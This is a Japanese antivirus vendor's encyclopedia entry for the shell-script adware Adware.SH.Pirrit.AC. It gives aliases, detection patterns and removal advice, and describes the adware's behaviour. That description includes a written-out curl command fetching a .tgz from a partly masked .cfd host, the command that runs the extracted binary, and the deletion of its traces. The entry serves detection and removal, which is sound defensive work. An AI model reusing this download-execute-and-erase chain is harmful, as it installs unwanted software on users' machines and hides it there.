Adware.SH.Pirrit.AC
別名:
MacOS:Pirrit-DU [PUP] (AVAST)
プラットフォーム:
Linux
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
マルウェアタイプ:
アドウェア
破壊活動の有無:
なし
暗号化:
感染報告の有無 :
はい
概要
アドウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
ファイルサイズ 326 bytes
タイプ Other
発見日 2023年12月20日
侵入方法
アドウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
アドウェアは、以下のプロセスを追加します。
- curl -s -L -o "/var/tmp/Pipidae.tgz" "http://{BLOCKED}.cfd/static/s3/exec6625/{BLOCKED}.tgz"
その他
アドウェアは、以下のWebサイトにアクセスして不正なファイルをダウンロードします。
- http://{BLOCKED}.cfd/static/s3/exec6625/{BLOCKED}.tgz
アドウェアは、以下を実行します。
- It extracts the downloaded file then saves it with the following filename:
- /var/tmp/Pipidae/Pipidae
アドウェアは、以下のコマンドを利用してダウンロードしたファイルを実行します。
- cd "/var/tmp/Pipidae/"
./Pipidae -ct cX
アドウェアは、感染コンピュータ内の自身の痕跡を削除するために、以下のファイルを削除します。
- 120 秒後に削除:
- /var/tmp/Pipidae
- /var/tmp/Pipidae.tgz
<補足>
アドウェアは、ダウンロードしたファイルを抽出し、以下のファイル名で保存します。
- /var/tmp/Pipidae/Pipidae
対応方法
対応検索エンジン: 9.800
SSAPI パターンバージョン: 2.687.00
SSAPI パターンリリース日: 2023年12月21日
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Adware.SH.Pirrit.AC」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください